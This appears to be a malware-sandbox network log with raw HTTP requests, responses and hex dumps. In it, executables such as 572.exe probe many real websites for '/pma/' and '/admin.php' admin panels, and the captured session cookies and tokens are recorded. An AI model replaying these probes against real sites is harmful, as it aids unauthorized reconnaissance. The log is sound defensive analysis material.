                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC6INData Raw: 31 62 63 66 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1bcf
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC7119INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 21 2d 2d 20 73 3a 68 65 61 64 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 61 72 63 68 69 76 65 22 3e 0a 09 3c 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es" class="login"><head>... s:head --><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="robots" content="noindex,noarchive"><t
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                249192.168.2.650072142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 43 35 36 63 5f 33 6a 5f 55 6e 31 6d 51 6b 48 36 73 32 6f 38 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JC56c_3j_Un1mQkH6s2o8Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                250192.168.2.64969944.199.96.179443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC180OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC197INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7358
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "5df8f9a3-1cbe"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC7358INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d e2 80 9c 73 74 79 6c 65 73 68 65 65 74 e2 80 9d 20 68 72 65 66 3d e2 80 9c 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 6e 6b 77 33 70 6c 72 2e 63 73 73 e2 80 9c 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 20 2a 3a 62 65 66 6f 72 65 2c 20 2a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                251192.168.2.65012245.60.0.44443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC407OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: incap_ses_1816_2786379=GmwLPGm/8ysfgRA+arozGXzDwGUAAAAAWc95nFYQh4VkaUEfADF5kQ==; visid_incap_2786379=hlpIXcn9RyeS5pqQjLHvrXzDwGUAAAAAQUIPAAAAAADprIzRk3UO2rMvvlyroBMr; nlbi_2786379=qQ7OL9ri/xfPwc9vaJQkpgAAAAAT6+z8Xi/STIi/imJ8KXK7
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC354INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 3-31484936-31484965 NNNY CT(118 135 0) RT(1707131773054 398) q(0 0 0 -1) r(0 1) U24
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1098INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC147INData Raw: 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                252192.168.2.65014744.195.133.145443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC327OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE10F8662CA549F3FD503336620C511FF443E7315D4F16653F0D42A1913B3F30D1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1164INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=332FB88B45E9EB81F6BACCCF705B366D; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142573,id:BACE518A0254BE88AEC72401327C324F,signature:4f85f8d832ff8973a5a17f3db3b432844edbd28973253f045f40ac3433431bb2,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:6b7d414b-c187-45ec-8d36-7837b2db00f2; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-251-41.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC15220INData Raw: 62 62 35 39 0d 0a 3c 21 2d 2d 20 54 68 69 73 20 6c 6f 67 69 6e 2e 6a 73 70 20 66 69 6c 65 20 69 73 20 74 61 67 67 65 64 20 77 69 74 68 20 63 6f 6d 6d 65 6e 74 73 20 69 64 65 6e 74 69 66 79 69 6e 67 20 73 65 63 74 69 6f 6e 73 20 66 6f 72 20 65 61 73 79 20 65 64 69 74 69 6e 67 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 65 63 74 69 6f 6e 20 62 65 6c 6f 77 20 63 61 6c 6c 73 20 76 61 72 69 6f 75 73 20 73 65 72 76 6c 65 74 73 20 66 72 6f 6d 20 74 68 65 20 4c 65 61 72 6e 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 20 61 6e 64 20 6f 74 68 65 72 20 74 68 69 6e 67 73 20 79 6f 75 20 64 6f 6e 27 74 20 77 61 6e 74 20 74 6f 20 74 6f 75 63 68 2e 20 44 6f 20 6e 6f 74 20 64 65 6c 65 74 65 20 61 6e 79 74 68 69 6e 67 20 69 6e 20 74 68 69 73 20 73 65 63 74 69 6f 6e 20 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: bb59... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC16384INData Raw: 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 46 45 54 43 48 3a 69 2e 5f 41 2e 66 65 74 63 68 7d 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 6c 65 74 20 72 3d 61 28 29 3b 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 3f 3d 7b 7d 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 74 3d 7b 6d 73 3a 28 30 2c 6e 2e 7a 29 28 29 2c 64 61 74 65 3a 6e 65 77 20 44 61 74 65 7d 2c 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 20 74 3d 61 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 2e 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 61 28 29 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72 65 74 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tationObserver,FETCH:i._A.fetch}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]=t}function l(){retu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC16365INData Raw: 54 20 49 43 4f 4e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 75 6c 74 72 61 2e 63 73 73 3f 76 3d 33 39 30 30 2e 38 34 2e 30 2d 72 65 6c 2e 33 31 2b 61 65 64 66 66 38 32 22 20 69 64 3d 22 63 73 73 5f 30 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 6d 75 6c 74 69 5f 66 61 63 74 6f 72 5f 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: T ICON" type="image/x-icon" href="/favicon.ico"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_factor_authentication.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC19INData Raw: 33 66 66 30 0d 0a e1 b8 a5 61 72 72 61 6d 2c e1 b9 a2 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3ff0arram,a
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC16384INData Raw: 66 61 72 2c 52 61 62 c4 ab ca bf 5c 27 61 6c 2d 41 77 77 61 6c 2c 52 61 62 c4 ab ca bf 5c 27 61 74 68 2d 54 68 c4 81 6e c4 ab 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 6c 2d c5 aa 6c c4 81 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 74 68 2d 54 68 c4 81 6e 69 79 61 2c 52 61 6a 61 62 2c 53 68 61 ca bf 62 c4 81 6e 2c 52 61 6d 61 e1 b8 8d c4 81 6e 2c 53 68 61 77 77 c4 81 6c 2c 44 68 c5 ab 5c 27 61 6c 2d 51 61 ca bf 64 61 2c 44 68 c5 ab 5c 27 61 6c 2d e1 b8 a4 69 6a 6a 61 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 47 52 45 45 54 49 4e 47 27 5d 20 3d 20 27 42 69 65 6e 76 65 6e 69 64 6f 2c 20 7b 31 7d 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: far,Rab\'al-Awwal,Rab\'ath-Thn,Jumd\'al-l,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTINGS['LOCALE_SE
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC16384INData Raw: 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 64 65 70 6c 6f 79 6d 65 6e 74 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 63 6f 6e 74 65 6e 74 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 6f 72 74 66 6f 6c 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 65 76 69 64 65 6e 63 65 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: eteCookie("JSESSIONID", "/deployment", null, true); deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); delete
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC12559INData Raw: 76 20 63 6c 61 73 73 3d 22 6d 66 61 2d 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 6d 66 61 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 74 69 74 6c 65 22 20 3e 41 75 74 65 6e 74 69 63 61 63 69 c3 b3 6e 20 64 65 20 6d c3 ba 6c 74 69 70 6c 65 73 20 66 61 63 74 6f 72 65 73 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 74 6f 74 70 2d 76 65 72 69 66 69 63 61 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: v class="mfa-modal-title"> <h1 id="mfa-verification-title" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verificatio


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                253192.168.2.649726172.67.170.1474434632C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
